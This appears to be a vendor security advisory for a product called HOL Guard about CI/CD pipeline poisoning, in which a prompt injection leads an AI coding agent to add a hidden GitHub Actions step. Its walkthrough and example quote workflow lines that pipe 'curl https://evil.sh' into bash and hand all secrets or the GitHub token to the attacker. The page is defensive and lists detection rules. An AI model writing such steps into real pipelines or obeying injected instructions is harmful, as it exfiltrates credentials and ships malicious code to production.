How dangerous is CI/CD pipeline poisoning?

Extremely. CI/CD pipelines have access to all build secrets — npm tokens, Docker registry credentials, cloud deploy keys, and GitHub tokens with write access. A single malicious step can exfiltrate every secret and deploy malicious code to production.

Should I let AI agents modify CI/CD configs?

Only with Guard reviewing the changes and a human approving the PR. CI/CD configs are high-risk files that should be reviewed as carefully as production code. Guard can flag dangerous patterns, but human review is essential.

critical severityCurated advisory

CI/CD pipeline poisoning via agent-written config

AI agents that write CI/CD configuration files (GitHub Actions, GitLab CI, CircleCI) can introduce backdoors — injecting steps that exfiltrate secrets, modify artifacts, or deploy malicious code — that execute on every build.

Protect my harness Protect a team

Affected surfacesGitHub Actions workflowsGitLab CI configsCI/CD secretsbuild artifacts

The attack

What happens

A prompt injection causes an AI agent to modify a CI/CD pipeline configuration — adding a step that exfiltrates secrets, modifies build artifacts, or deploys malicious code. The backdoor executes on every subsequent build.

Step by step

How the attack unfolds

1Agent is asked to update or fix a GitHub Actions workflow.

2Prompt injection adds a step: "- run: curl https://evil.sh | bash" with "env: SECRETS_CONTEXT: ${{ toJSON(secrets) }}".

3Agent modifies the workflow file and commits the change.

4On the next push to main, the workflow runs and sends all GitHub Actions secrets to the attacker.

Example

What it looks like in practice

Scenario

A developer asks Cursor to "add a lint step to the GitHub Actions workflow." Cursor adds the lint step but also adds a hidden step: "- name: Cache dependencies run: curl https://evil.sh/payload | bash env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}". On the next push, the workflow sends the GitHub token to the attacker.

Detection

How Guard catches this

Guard flags CI/CD config changes that add steps with curl, wget, or other network operations.

Guard alerts on steps that reference secrets, tokens, or credentials.

Guard detects workflow changes that add permissions: write-all or elevated GitHub token scopes.

Mitigation

How to stop it

Recommended action

Review all CI/CD config changes made by AI agents. Use Guard to flag workflow modifications that add steps with curl/wget, reference secrets, or run on every push to main.

Guard configuration

Enable "CI/CD config change detection" to flag modifications to workflow files.

Enable "Secret reference detection" to flag steps that use secrets or tokens.

Enable "Network operation detection" to flag steps that include curl, wget, or other network commands.

FAQ

Common questions

Related advisories

More threats to know about

high

Dockerfile injection via AI agent writes

When AI agents write or modify Dockerfiles, prompt injection can cause them to add malicious instructions — pulling attacker-controlled base images, exfiltrating build secrets, or installing backdoors that persist across all container builds.

Read advisory

critical

npm postinstall script abuse in AI coding environments

Malicious npm packages use postinstall scripts to execute arbitrary code during installation. In AI coding environments, these scripts can modify agent configuration, install backdoor MCP servers, or exfiltrate project secrets — all before the developer reviews the package.

Read advisory

Stop this threat before it reaches your agent

Install HOL Guard to get real-time protection against this attack and others like it.

Install HOL Guard See team plans